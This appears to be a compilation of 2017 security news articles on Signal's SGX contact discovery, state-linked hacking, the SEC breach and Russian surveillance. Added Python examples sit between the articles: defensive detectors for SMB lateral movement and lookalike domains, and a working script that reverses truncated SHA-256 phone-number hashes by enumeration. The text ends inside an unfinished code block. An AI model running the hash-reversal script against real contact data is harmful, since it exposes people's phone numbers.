“Since the enclave attests to the software that’s running remotely, and since the remote server and OS have no visibility into the enclave, the service learns nothing about the contents of the client request. It’s almost as if the client is executing the query locally on the client device,” explained Moxie Marlinspike, the founder of Open Whisper Systems.

While this sounds like a straightforward process, there are many challenges that Signal developers need to overcome. The private contact discovery service is currently a beta technology preview, but Open Whisper Systems hopes to have it integrated into clients in the next few months.

In the meantime, the source code for the private contact discovery service can be analyzed by anyone.
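As an added example (not Signal's or Open Whisper Systems' code), the following Python script shows why a truncated SHA-256 of a phone number, as described in the two articles above, is not a privacy protection: the phone-number space is small enough to enumerate, so a server that logs requests (or anyone who obtains the uploaded tokens) can precompute a table and map every token back to a number. The truncation length (10 bytes) and the +1555 number block are assumptions for illustration; the articles only say "truncated SHA256".

```python
import hashlib
from typing import Dict, Iterable, Optional

# Assumption for illustration: the articles only say "truncated SHA256";
# the real truncation length is not stated on the page.
TRUNC_BYTES = 10


def contact_token(phone: str, trunc_bytes: int = TRUNC_BYTES) -> bytes:
    """Truncated SHA-256 of an E.164 phone number, modelling the legacy
    contact-discovery token a client uploads for each address-book entry."""
    return hashlib.sha256(phone.encode("ascii")).digest()[:trunc_bytes]


def build_table(prefix: str, unknown_digits: int,
                trunc_bytes: int = TRUNC_BYTES) -> Dict[bytes, str]:
    """Precompute token -> number for every number under `prefix`.

    The work is 10**unknown_digits hash evaluations, fixed by the size of
    the phone-number space, not by the strength of SHA-256. A whole country
    code is on the order of 10**10 numbers, which is feasible on commodity
    hardware and trivially parallel; the hash adds no protection here."""
    table: Dict[bytes, str] = {}
    for n in range(10 ** unknown_digits):
        phone = f"{prefix}{n:0{unknown_digits}d}"
        table[contact_token(phone, trunc_bytes)] = phone
    return table


def recover(tokens: Iterable[bytes],
            table: Dict[bytes, str]) -> Dict[bytes, Optional[str]]:
    """What a logging (or modified) server learns from an upload: every
    token inside the precomputed block maps straight back to a number."""
    return {t: table.get(t) for t in tokens}


def demo() -> Dict[bytes, Optional[str]]:
    # Constructed sample upload: three address-book entries, two inside the
    # +1555 block the attacker precomputed and one outside it.
    uploaded = [contact_token("+155501234"),
                contact_token("+155598765"),
                contact_token("+166600000")]
    # 100,000 candidate numbers; well under a second in CPython.
    table = build_table("+1555", unknown_digits=5)
    return recover(uploaded, table)


if __name__ == "__main__":
    for token, number in demo().items():
        print(token.hex(), "->", number or "not in precomputed block")
```

The enclave design described in the articles removes this exposure not by hashing harder but by making sure the service operator never sees the tokens at all: the lookup runs inside attested code, and the host only ever handles ciphertext.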

The use of Intel’s SGX technology can have many benefits, but researchers demonstrated recently that it can also be abused for malicious purposes. A team from an Austrian university showed in March that malware running on SGX can attack the host and extract RSA private keys.


Seoul Says North Korean Hackers Tried to Steal Bitcoins: Yonhap
27.9.2017 securityweek BigBrothers
Police investigations have pointed to North Korea as responsible for recent attempts to hack South Korea's virtual currency exchanges, a report said Wednesday.

They reached the conclusion after investigating cyber-attacks on dozens of email accounts of employees at four local bitcoin exchanges, Yonhap news agency said.

North Korea is heavily sanctioned by the United Nations for its nuclear and missile programs and speculation has been mounting that the cash-strapped regime is turning to digital currency to obtain funds.

Police said the North Korean hackers, pretending to be security authorities, sent emails containing malware between July and August this year, according to Yonhap.

The emails were sent from the same IP address linked to previous North Korean hacking attempts against Seoul, police were quoted as saying.

The test emails sent before the actual attack were traced back to the North, the report said.

No computers were compromised and no digital currency was stolen in any of the cases, the report said. Police could not be reached for comment.

South Korea is one of the world's busiest trading hubs for cryptocurrencies, with Seoul-based Bithumb ranking as the world's largest exchange for the ethereum virtual currency.

A report by FireEye earlier this month said North Korean hackers had launched attacks on at least three South Korean cryptocurrency exchanges since May.

The hackers were using "spearphishing" attacks, it said, targeting the personal email accounts of employees at the exchanges.

"It should be no surprise that cryptocurrencies, as an emerging asset class, are becoming a target of interest by a regime that operates in many ways like a criminal enterprise", it said.


US Financial Regulator Launches Unit to Police Cyber-threats
26.9.2017 securityweek BigBrothers
The US Securities and Exchange Commission has announced it is setting up a special unit dedicated to identifying cyber-related misconduct.

The announcement came days after the top US financial regulator disclosed that it had been the victim of a hacking attack in 2016, and that the perpetrators may have been able to profit from the information.

In a statement the SEC said the new unit, which has been in the works for months, "will focus on targeting cyber-related misconduct" including market manipulation schemes, hacking and intrusions into retail brokerage accounts.

"Cyber-related threats and misconduct are among the greatest risks facing investors and the securities industry," said Stephanie Avakian, co-director of the SEC's Enforcement Division.

"The Cyber Unit will enhance our ability to detect and investigate cyber-threats through increasing expertise in an area of critical national importance."

The attack on the SEC targeted the agency's EDGAR database, which contains data from publicly traded companies such as earnings statements and corporate transactions.

A "software vulnerability" was quickly fixed after the intrusion was discovered, but the hackers had already been able to access "non-public information," the SEC said of the cyber-attack.

The news came on the heels of one of the worst-ever breaches of personal data, revealed after the American firm Equifax announced it was the victim of a hacking attack that compromised the personal data of more than 140 million Americans, 400,000 Britons and 100,000 Canadians.

Deloitte also acknowledged Monday that its computer systems had been targeted but insisted the consequences were limited.

In its announcement Monday the SEC also said it was launching a "Retail Strategy Task Force" aimed at identifying "misconduct impacting retail investors."


Even More Evidence That Russia Was Meddling in the 2016 US Election
26.9.2017 securityaffairs BigBrothers

Evidence that Russian hackers attempted to interfere with the 2016 US Election continues to pile up: the DHS has notified states whose systems were targeted by APT groups.

Rumours started almost as soon as the 2016 US Election was over; individuals within the White House have been questioned, and Facebook has identified ad campaigns funded by Russian-linked groups that appear designed to sway voter opinion. This week we learned that the Department of Homeland Security (DHS) has notified election officials in at least 21 states that they were targeted by Russian-linked groups during the 2016 US Election.

In February 2017, several States accused the DHS of trying to hack their state electoral systems during the previous months. Indiana, Ohio, Georgia and Idaho all claimed that the DHS had performed security scans of their networks without permission. Kentucky and West Virginia also reported evidence of DHS “security scans” but said the work had been previously authorized. It now appears that the scans did not originate from the DHS but from Russian-linked hacking groups.

2016 US Election

In June of 2017, DHS cybersecurity official Jeanette Manfra confirmed that the Department had determined as early as October 2016, “that Internet-connected election-related networks, including websites, in 21 states were potentially targeted by Russian government cyber actors.” In a US Senate Intelligence Committee hearing in July, DHS officials claimed, “the owners of the systems within those 21 states have been notified.” But that is misleading. The DHS does not disclose which States it notified, but some of those states coming forward admit they were not notified until after the July Committee meeting.

Understandably, many people are critical of how long it took the DHS to notify potentially impacted States:


NBC Politics (@NBCPolitics), 10:44 PM - Sep 22, 2017:
JUST IN: “Russian government cyber actors” unsuccessfully attempted to hack 2016 election results in Wisconsin, DHS tells state officials
“It’s unacceptable that it took almost a year after the election to notify states that their elections systems were targeted, but I’m relieved that DHS has acted upon our numerous requests,” said Virginia Senator Mark Warner, the Intelligence Committee’s top Democrat, who is helping lead the Senate’s investigation into Russia’s election meddling.

The DHS is in a difficult position. In the final months of 2016, state officials and the DHS determined that “someone” was scanning election-related networks for potential vulnerabilities. Scanning is one of the first steps toward a compromise, and it happens thousands of times a day.
Attribution — trying to determine who is behind the scanning — is very challenging. Several States suspected the DHS of scanning while it now seems to have been the work of Russian-linked groups. On one hand, the DHS needs to inform targeted States that they are facing an elevated risk. On the other hand, they need to provide meaningful information to allow those States to take appropriate actions. In most cases, it appears no action was required. Arizona admits that hackers obtained the username and password for a County official and Illinois officials confirmed that hackers had breached its voter system. The other 19 States have not identified any successful penetrations of their networks. So far, it appears that the long delay in notifications from the DHS did not impact voters’ information or election results.
According to the Associated Press the 21 States that were notified of Russian-linked security scans against their networks include: Alabama, Alaska, Arizona, California, Colorado, Connecticut, Delaware, Florida, Illinois, Iowa, Maryland, Minnesota, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Texas, Virginia, Washington and Wisconsin.


Banking Trojan Uses NSA-Linked Exploit
26.9.2017 securityweek BigBrothers
Newly observed Retefe banking Trojan samples have implemented the National Security Agency-related EternalBlue exploit, Proofpoint security researchers have discovered.

Unlike previous malware attacks that exploited EternalBlue, however, the new campaign doesn’t abuse it to spread in an infinite loop. In fact, the exploit-carrying samples are distributed via spam emails, while the version dropped via EternalBlue lacks the exploit.

EternalBlue is an NSA-linked exploit that became public in April, one month after Microsoft released a patch for the flaw it targets. The exploit leverages a vulnerability in Windows’ Server Message Block (SMB) implementation, reachable on TCP port 445, and lets attackers execute code on vulnerable systems without any user interaction.

The exploit became widely known after being abused in the massive WannaCry ransomware campaign that unfolded in May this year. Other malware, however, had been abusing it for weeks before that.

In a recent campaign targeting users in Switzerland, some of the Retefe samples Proofpoint has collected since September 5 included EternalBlue to add lateral movement capabilities.

Retefe is a banking Trojan active since 2013, well known for its continuous focus on users in Austria, Sweden, Switzerland and Japan. The malware operates by routing traffic to and from the targeted banks through proxy servers, often hosted on the TOR network.

Recently, the malware has mostly been distributed through spam email campaigns with a Microsoft Office document attached. Using social engineering, the attackers rely on the attachments to trick users into downloading a malicious payload.

In recent campaigns, a self-extracting Zip archive containing a multiply-obfuscated JavaScript installer was downloaded. While analyzing the installer code, the security researchers have discovered that recent samples contained a new parameter designed to implement the EternalBlue exploit.

The code was borrowed from a publicly available proof-of-concept posted on GitHub, but functionality to log the installation and victim configuration details was also included. Last week, the parameter was replaced with a new one that contains only the logging functions.

“The EternalBlue exploit downloads a PowerShell script from a remote server, which itself includes an embedded executable that installs Retefe. This installation, however, lacks the module responsible for further lateral spread via EternalBlue, thus avoiding an infinite spreading loop,” Proofpoint says.

The security researchers also note that malware versions compatible with Mac OS have been distributed between June and August this year.

“While far less widespread than other banking Trojans like Dridex or The Trick, the focus on Swiss banks provides the Retefe group with potential high-profile targets. In addition, we are observing increasingly targeted attacks from this group that, with the addition of the EternalBlue exploit, creates opportunities for effective propagation within networks once initial targets have been compromised,” Proofpoint notes.
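The lateral-movement behaviour described above has a recognisable network signature: one host opening SMB (TCP/445) connections to many peers in quick succession. The detector below, added here as an illustration and not code from Proofpoint or from the Retefe samples, flags that fan-out in a connection log. The log format, the sample log lines, the 60-second window and the five-peer threshold are all assumptions constructed for the example.

```python
"""Flag hosts that fan out to SMB (TCP/445) on many peers inside a short window,
the on-the-wire shape of EternalBlue-style lateral movement.

Added illustration, not code from Proofpoint or from the Retefe samples. The
log format (timestamp, source IP, destination IP, destination port per new
connection), SAMPLE_LOG, the 60-second window and the five-peer threshold are
assumptions constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.1.15 sweeps ten neighbours on 445 in nine seconds,
# 10.0.1.40 talks to one file server twice, 10.0.1.42 reaches two hosts an hour
# apart, and 10.0.1.41 is HTTPS noise.
SAMPLE_LOG = """\
2017-09-05T10:00:01 10.0.1.15 10.0.1.20 445
2017-09-05T10:00:02 10.0.1.15 10.0.1.21 445
2017-09-05T10:00:02 10.0.1.15 10.0.1.22 445
2017-09-05T10:00:03 10.0.1.15 10.0.1.23 445
2017-09-05T10:00:04 10.0.1.15 10.0.1.24 445
2017-09-05T10:00:05 10.0.1.15 10.0.1.25 445
2017-09-05T10:00:06 10.0.1.15 10.0.1.26 445
2017-09-05T10:00:07 10.0.1.15 10.0.1.27 445
2017-09-05T10:00:08 10.0.1.15 10.0.1.28 445
2017-09-05T10:00:09 10.0.1.15 10.0.1.29 445
2017-09-05T10:00:01 10.0.1.40 10.0.1.5 445
2017-09-05T10:05:01 10.0.1.40 10.0.1.5 445
2017-09-05T10:00:03 10.0.1.41 10.0.1.6 443
2017-09-05T11:00:00 10.0.1.42 10.0.1.20 445
2017-09-05T12:00:00 10.0.1.42 10.0.1.21 445
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst, port) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, port = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return events


def smb_fanout(events, window_seconds=60, min_peers=5, port=445):
    """Return {src_ip: peers} for every source that contacted at least
    `min_peers` distinct hosts on `port` within some `window_seconds` interval."""
    window = timedelta(seconds=window_seconds)
    by_src = defaultdict(list)
    for ts, src, dst, dport in events:
        if dport == port:
            by_src[src].append((ts, dst))
    alerts = {}
    for src, conns in by_src.items():
        conns.sort()
        best, start = 0, 0
        for end in range(len(conns)):
            # Advance the window start until conns[start:end+1] spans at most `window`.
            while conns[end][0] - conns[start][0] > window:
                start += 1
            peers = {dst for _, dst in conns[start:end + 1]}
            best = max(best, len(peers))
        if best >= min_peers:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    for src, peers in smb_fanout(parse_log(SAMPLE_LOG)).items():
        print(f"ALERT {src}: {peers} distinct SMB peers inside one 60s window")
```

A vulnerability scanner, a backup server or a desktop-management agent will trip the same heuristic, so an allowlist of expected SMB talkers belongs in front of it. The detector is a stopgap; the durable fix for EternalBlue is the March 2017 SMB patch (MS17-010) and disabling SMBv1 wherever nothing still needs it.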


DHS Notifies States Targeted by Russia in Election Hacks
25.9.2017 securityweek BigBrothers
The U.S. Department of Homeland Security (DHS) has finally notified the states whose systems were targeted by hackers before last year’s presidential election.

DHS officials told the Senate Intelligence Committee in June that a threat group believed to be working for the Russian government had targeted websites and other voting-related systems in 21 states.

The agency said at the time that only a small number of networks were actually breached, and it did not find any evidence that vote tallies had been altered. Nevertheless, many officials agree that Russia did at least try to influence the outcome of the election.

The DHS has now informed state officials about the attacks in an effort to help them improve the security of their systems before next year’s midterm elections.

The DHS has not named any of the targets, but some state officials published statements on their websites or social media profiles. The list of states that admitted being contacted by the agency includes Alabama, Arizona, California, Connecticut, Colorado, Iowa, Minnesota, Wisconsin and Washington.

The Associated Press and other news agencies reported that the list of targeted states also includes Alaska, Delaware, Florida, Maryland, North Dakota, Ohio, Oklahoma, Oregon, Pennsylvania, Texas and Virginia. Illinois was named one of the targets in the summer of 2016, when officials shut down voter registration after hackers gained access to as many as 200,000 records.

All the states that published statements about being notified by the DHS said their systems were either only scanned for vulnerabilities, or their security products blocked the intrusion attempts.

Colorado, for instance, sought to reassure voters, pointing out that its systems were only scanned and compared the process to “burglars jiggling the doors of a house and moving on when they realize the doors are locked.”

While the attacks do not appear to have had a significant impact, some officials are displeased with the fact that it has taken the DHS so long to notify officials.

“It's unacceptable that it took almost a year after the election to notify states that their elections systems were targeted, but I'm relieved that DHS has acted upon our numerous requests and is finally informing the top elections officials in all 21 affected states that Russian hackers tried to breach their systems in the run up to the 2016 election,” said Sen. Mark R. Warner (D-VA), vice chairman of the Senate Select Committee on Intelligence.

“We have to do better in the future. Our elections are the bedrock of our democracy, and DHS needs to notify states and localities in real-time when their systems are targeted,” Sen. Warner added. “While I understand that DHS detects thousands of attempted cyber attacks daily, I expect the top election officials of each state to be made aware of all such attempted intrusions, successful or not, so that they can strengthen their defenses -- just as any homeowner would expect the alarm company to inform them of all break-in attempts, even if the burglar doesn't actually get inside the house.”

Congressman Adam Schiff said on Twitter that the DHS should notify states of attempted election hacking in real time.


California Secretary of State Alex Padilla is also displeased with the fact that the notification came so late.

“It is completely unacceptable that it has taken DHS over a year to inform our office of Russian scanning of our systems, despite our repeated requests for information. The practice of withholding critical information from elections officials is a detriment to the security of our elections and our democracy,” Padilla stated.

“In a letter I sent to Admiral Michael S. Rogers of the National Security Agency (NSA) earlier this year in June, I expressed serious concern about the NSA's failure to provide timely and critical information to America's elections officials. We shouldn’t have to learn about potential threats from leaked NSA documents or media reports. It is the intelligence community’s responsibility to inform elections officials of any potential threats to our elections. They failed in this responsibility,” Padilla added.


Germany on Guard Against Election Hacks, Fake News
22.9.2017 Securityweek BigBrothers
As the clock ticks down to elections Sunday, Germany's cyber defense nervously hopes it'll be third time lucky after Russia was accused of meddling in the US and French votes.

But even if Berlin avoids a last-minute bombshell of leaks or online sabotage, it sees Moscow's hand in fanning fears of Muslim migrants that are driving the rise of the hard-right.

Forecasters say Chancellor Angela Merkel is almost certain to win.

But for the first time in German post-war history, a right-wing populist, anti-immigration party will have its own group on the opposition benches.

The Alternative for Germany (AfD) -- which calls Merkel a "traitor" for her 2015 welcome to refugees -- has been promoted especially in internet echo chambers by far-right trolls and ultra-nationalists.

While mainstream media have treated the AfD with distaste, the most positive coverage has appeared in Kremlin-funded media such as RT and Sputnik, which have also heavily focussed on migrant crime.

The London School of Economics (LSE) found that "official Russian media and unofficial pro-Russian trolls offer constant and repetitive support for the AfD and its anti-immigrant message," wrote journalist Anne Applebaum, a participant in the monitoring project.

The AfD, meanwhile, has been actively courting the 2.5 million-strong Russian-German community with neighbourhood stands, flyer campaigns and a Russian-language YouTube channel.

Especially elderly and poor Russian-Germans have been receptive to xenophobic and anti-Muslim messages amid the 2015 mass migrant influx, said Berlin community leader Alexander Reiser.

"The fear was stoked by Russian TV, which presented it as a catastrophe, of Europe being flooded by migrants," he said, pointing also to Russians' "traumatic memories" of the Soviet collapse and Russia's wars against Islamic fundamentalists.

- Sowing doubt, discord -

The risk of Moscow attempting to use Russian-Germans as pawns moved into the spotlight with the 2016 case of "Our Lisa".

Russian media spread the story -- quickly debunked by German police -- of three Muslim men who raped a 13-year-old Russian-German girl, and of a subsequent cover-up by police and politicians.

It sparked Russian-German street protests that escalated into a top-level diplomatic dispute between Berlin and Moscow.

Many Russian-Germans believed the conspiracy tale because they "projected their Russia experience onto the case," said Reiser, who estimated that 15-20 percent remain "stuck in a totalitarian way of thinking and will never fully understand democracy".

A top-level government official told AFP the Lisa case was Berlin's "wake-up call" on Russian propaganda.

Other fake news stories followed, including one claiming German NATO soldiers in Lithuania raped a young girl.

Berlin's biggest fear, however, has focussed on a massive 2015 malware attack that crippled the Bundestag parliamentary network for days.

It netted 17 gigabytes of data which, officials feared, could be used to blackmail MPs or discredit them, possibly on new "BTLeaks" websites.

German security chiefs said "smoking gun" proof was impossible but blamed the hacker group known as Fancy Bear or APT28, which has been linked to Russia's GRU military intelligence and accused of attacks on Hillary Clinton's 2016 presidential campaign.

IT security experts sprang into action by drilling MPs and sensitising the public about the risk of online mischief, meme wars and other disinformation designed to sow doubt and discord and delegitimise the democratic process.

Security agencies BND and BfV warned of Russian influence operations, the IT security agency BSI started war-gaming attacks, and the military launched a Cyber Command while musing about the option of "hack-back" counterstrikes.

- Patriotic hackers -

The Brookings Institution's Constanze Stelzenmueller told a US Senate committee in June that "for a Russia that is clearly bent on destabilising Europe and the transatlantic alliance, Germany is the prize".

Russian President Vladimir Putin has denied Moscow seeks to influence foreign elections but said that "patriotic hackers" are beyond Moscow's control.

Weeks after Trump's election, Merkel consulted experts about fake news and the bot algorithms that make them go viral.

"She was very interested, but not panicking," recalled Simon Hegelich of Munich's Technical University.

Media outlets ramped up fact-checking teams, political parties pledged not to use campaign bots, and a new law passed threatening to heavily fine social media giants that fail to speedily remove hate speech and other "illegal content".

Days before the election, there has been no mass leak, raising cautious speculation as to why Germany may have been spared.

For one, Germany's multi-party elections are harder to swing than a presidential two-horse race, and Merkel enjoys a huge, double-digit lead.

Then there is the risk of a damaging backlash, and of alienating pro-Russia lawmakers found across the German party system.

Interior Minister Thomas de Maiziere said Wednesday that "we have no indication that Putin interfered in the election".

On a note of caution, he added: "Maybe they decided not to do it, maybe it's still coming."


SEC Says It Was Hacked in 2016
21.9.2017 securityweek BigBrothers
The United States Securities and Exchange Commission (SEC) said late Wednesday that it was the victim of a cyber-attack in 2016 that may have allowed hackers to profit through trading on non-public information in its EDGAR filing system.

“In August 2017, the Commission learned that an incident previously detected in 2016 may have provided the basis for illicit gain through trading,” the Commission announced.

“Specifically, a software vulnerability in the test filing component of the Commission’s EDGAR system, which was patched promptly after discovery, was exploited and resulted in access to nonpublic information,” the announcement continued.

An internal investigation was commenced immediately at the direction of SEC Chairman Jay Clayton.

According to Clayton, the EDGAR system receives and processes over 1.7 million electronic filings per year.

“While we don’t have any technical details of the data breach, I would refrain from making any conclusions about its origins or attackers,” Ilia Kolochenko, CEO of web security company High-Tech Bridge, told SecurityWeek. “The SEC statement is very obscure and may provoke speculation and rumors around it, including attempts to blame nation-states or attribute it to (in)famous hacking groups.”


While the SEC made no suggestion as to the threat actor(s) behind the attack, it is certainly not the first time attackers have targeted non-public company information that could be used to gain insights leading to profits.

In March 2017, FireEye shared details of a cybercrime group tracked by the company as FIN7, which had been observed targeting nearly a dozen organizations in the United States, focusing on personnel that handles filings to the SEC.

In August 2015, the SEC announced that a cybercriminal group hacked into newswire services to steal non-public information about corporate earnings announcements that were used to make financial trades that generated more than $100 million in illegal profits.

In December 2016, the SEC charged three Chinese men accused of hacking into two New York-based law firms to steal information related to clients that were considering mergers or acquisitions, which the hackers then used to trade.

“Cybersecurity is critical to the operations of our markets and the risks are significant and, in many cases, systemic,” Chairman Clayton said in a statement. “We must be vigilant. We also must recognize—in both the public and private sectors, including the SEC—that there will be intrusions, and that a key component of cyber risk management is resilience and recovery.”

In a related statement, Clayton detailed the SEC's approach to cybersecurity as an organization and as a regulatory body.

“This incident clearly exposes how vulnerable our global financial ecosystem is, and how unprepared we are to fight skyrocketing cybercrime,” Kolochenko added. “In the future we will see steady fusion of common crime with cyber gangs that jointly may challenge state power and dictate their laws, while law enforcement agencies are catastrophically underfinanced by governments and just don’t have enough resource to tackle global cybercrime.”

The SEC said that the 2016 intrusion "did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk.”

News of the SEC hack comes less than two weeks after credit reporting agency Equifax said it was the victim of a massive cyber-attack that exposed sensitive data on more than 143 million people.


Iranian Hackers Target Aerospace, Energy Companies
20.9.2017 securityweek BigBrothers
A cyber espionage group linked by security researchers to the Iranian government has been observed targeting aerospace and energy organizations in the United States, Saudi Arabia and South Korea.

The threat actor, tracked by FireEye as APT33, is believed to have been around since at least 2013. Since mid-2016, the security firm has spotted attacks aimed by this group at the aviation sector, including military and commercial aviation, and energy companies with connections to petrochemical production.

Specifically, the cyberspies targeted a U.S. organization in the aerospace sector, a Saudi Arabian business conglomerate with aviation holdings, and a South Korean firm involved in oil refining and petrochemicals. In recent attacks, the hackers used job vacancies at a Saudi Arabian petrochemical firm to target the employees of organizations in South Korea and Saudi Arabia.

“We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia,” FireEye said in a blog post.

“We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies,” the company added.

According to FireEye, the cyber espionage group sent hundreds of spear phishing emails last year. They set up several domains made to look as if they belonged to Saudi aviation firms and international organizations that work with them, including Alsalam Aircraft Company, Boeing and Northrop Grumman Aviation Arabia.
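Defenders counter this tactic by watching new domain registrations and certificate-transparency logs for names that impersonate their own organisation or its partners. The scoring routine below, an added example rather than anything from FireEye's report, flags three patterns: the brand name itself registered somewhere other than an allowlisted domain (including homoglyph spellings such as a zero for an "o"), the brand embedded in a longer name, and names within one edit of the brand. The brand list reuses the three company names above; the candidate domains, the allowlist, the homoglyph table and the registrable-label heuristic are assumptions constructed for the example, and none of the candidates is a domain attributed to APT33.

```python
"""Score candidate domains against a watchlist of organisation names to spot
lookalike registrations of the kind described above.

Added example, not code from FireEye. WATCHLIST reuses the three company
names in the article; ALLOWLIST, SUBS, the registrable-label heuristic and
SAMPLE_DOMAINS are assumptions constructed for the example, and none of the
sample domains is attributed to APT33.
"""
import re

# Organisation names to protect, lower-case, letters only.
WATCHLIST = {"boeing", "northropgrumman", "alsalam"}

# Domains the organisations legitimately own (assumed and incomplete).
ALLOWLIST = {"boeing.com", "northropgrumman.com"}

# Character swaps attackers use to fake a familiar spelling (assumed list;
# 'rn' for 'm' is a visual trick, the digits are classic homoglyphs).
SUBS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]

# Constructed candidates, as they might arrive from a feed of new registrations.
SAMPLE_DOMAINS = [
    "boeing.com",
    "b0eing.com",
    "boeing-careers-ksa.com",
    "northropgrurnman.com",
    "nothropgrumman.com",
    "alsalam-aircraft.com.sa",
    "example.com",
]


def normalize(label):
    """Lower-case a DNS label, undo the homoglyph swaps, keep letters only."""
    label = label.lower()
    for fake, real in SUBS:
        label = label.replace(fake, real)
    return re.sub(r"[^a-z]", "", label)


def registrable_label(domain):
    """Crude registrable-label extraction: the label left of the public suffix,
    treating 'com.<cc>' style suffixes as two labels (heuristic, not a PSL lookup)."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) >= 3 and len(parts[-1]) == 2 and parts[-2] in {"com", "co", "net", "org"}:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else parts[0]


def edit_distance(a, b):
    """Levenshtein distance by dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,             # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify(domain, watchlist=WATCHLIST, allowlist=ALLOWLIST, max_dist=1):
    """Return a reason string if `domain` impersonates a watchlisted name, else None."""
    if domain.lower() in allowlist:
        return None
    label = normalize(registrable_label(domain))
    # Longest brand first, so a long name is matched before a shorter one it might contain.
    for brand in sorted(watchlist, key=len, reverse=True):
        if label == brand:
            return f"{brand}: brand name registered outside the allowlist"
        if brand in label:
            return f"{brand}: brand embedded in a longer name"
        dist = edit_distance(label, brand)
        if dist <= max_dist:
            return f"{brand}: edit distance {dist}"
    return None


def scan(domains):
    """Map each flagged domain to the reason it was flagged."""
    findings = {}
    for domain in domains:
        reason = classify(domain)
        if reason:
            findings[domain] = reason
    return findings


if __name__ == "__main__":
    for domain, reason in scan(SAMPLE_DOMAINS).items():
        print(f"{domain:28} {reason}")
```

The normalisation is deliberately aggressive (it would also rewrite a legitimate "western" to "westem"), which is the right trade-off for a triage feed that a human reviews; for automated blocking, pair it with a real public-suffix list and registrant data.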

The malware used by the group includes a dropper tracked by FireEye as DROPSHOT, a wiper named SHAPESHIFT, and a backdoor called TURNEDUP. DROPSHOT was previously analyzed by Kaspersky, which tracks it as StoneDrill.

The StoneDrill malware was tied by Kaspersky to the notorious Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef), a threat actor believed to be operating out of Iran.

FireEye has also linked APT33 to Iran based on connections to the “Nasr Institute,” which is said to be Iran’s “cyber army”, attacks launched during Iranian working hours, and the use of Iranian hacking tools.

Iran appears to have several cyber espionage groups, including Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten and CopyKittens.


Wikileaks Spy Files Russia – the surveillance apparatus implemented by firm Peter-Service
20.9.2017 securityaffairs BigBrothers

Wikileaks has released a new batch of documents that claim to detail the Russian mass surveillance apparatus implemented with the help of the firm Peter-Service.
Wikileaks has released a batch of documents, dubbed Spy Files Russia, that detail the surveillance infrastructure implemented in Russia. The Kremlin’s surveillance apparatus allows Russian agencies to spy on citizens’ online activities and mobile devices.

According to the Italian Wikileaks media partners, the Italian newspaper La Repubblica, the documents cover “an extended timespan from 2007 to June 2015”.


WikiLeaks (@wikileaks), 11:25 AM - Sep 19, 2017:
RELEASE: Spy Files #Russia https://wikileaks.org/spyfiles/russia/ #SORM #FSB
This is the first time Wikileaks has released material relating to the Russian state. The documents describe a Russian company that supplies software to telecommunications operators and also installs the equipment that Russian state agencies use to tap into their networks.

It is a surveillance apparatus that enables Russian intelligence to search and spy on citizens’ digital activity.

Wikileaks released 34 “base documents” relating to the activity of a St. Petersburg-based company called Peter-Service. The company, a contractor for Russian state surveillance, was set up in 1992 to provide billing solutions and is a major supplier of software to mobile telecoms operators.

“The technologies developed and deployed by PETER-SERVICE today go far beyond the classical billing process and extend into the realms of surveillance and control. Although compliance to the strict surveillance laws is mandatory in Russia, rather than being forced to comply PETER-SERVICE appears to be quite actively pursuing partnership and commercial opportunities with the state intelligence apparatus.” reported Wikileaks

“As a matter of fact PETER-SERVICE is uniquely placed as a surveillance partner due to the remarkable visibility their products provide into the data of Russian subscribers of mobile operators, which expose to PETER-SERVICE valuable metadata, including phone and message records, device identifiers (IMEI, MAC addresses), network identifiers (IP addresses), cell tower information and much more. This enriched and aggregated metadata is of course of interest to Russian authorities, whose access became a core component of the system architecture.”

Wikileaks PETER-SERVICE software architecture

It is interesting to note that the leaked documents never reference the Russian intelligence agency, the FSB, by name, but “speak only of state agencies.”

Under Russia law operators must maintain a Data Retention System (DRS) that allows them to store data for up to three years.

“The Peter-Service DRS system allows Russian state agencies to query the database of all stored data to search for information such as calls made by a certain telephone company customer, the payment systems used, the cell that served the specific mobile. The manuals published by WikiLeaks contain the images of the interfaces that allow agents to search within this huge trove of data, so access is simple and intuitive.” wrote Stefania Maurizi, on the Italian media outlet La Repubblica.

According to Wikileaks, Peter-Service’s DRS solution can handle 500,000,000 connections per day in a single cluster, and the claimed average search time for a subscriber’s records from a single day is ten seconds.

“The data retention system is a mandatory component for operators by law; it stores all communication (meta-)data locally for three years. State intelligence authorities use the Protocol 538 adapter built into the DRS to access stored information.” continues Wikileaks.

Peter-Service has also developed a system called TDM (Traffic Data Mart), which records and monitors IP traffic for all mobile devices registered with the operator.

The system enables Russian agencies to track online activity of the targets, including visited sites, forums, social media.

The TDM maintains a list of categorized domain names — “which cover all areas of interest for the state. These categories include blacklisted sites, criminal sites, blogs, webmail, weapons, botnet, narcotics, betting, aggression, racism, terrorism and many more”.

“Based on the collected information the system allows the creation of reports for subscriber devices (identified by IMEI/TAC, brand, model) for a specified time range: Top categories by volume, top sites by volume, top sites by time spent, protocol usage (browsing, mail, telephony, bittorrent) and traffic/time distribution.”
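To make concrete what such a report is derived from, here is a toy aggregator, added as an illustration and not Peter-Service code (the DRS/TDM internals are not published), that turns per-flow metadata into the report sections named in the quote. The flow records, the domain-to-category map, the TAC values and the protocol labels are all constructed for the example.

```python
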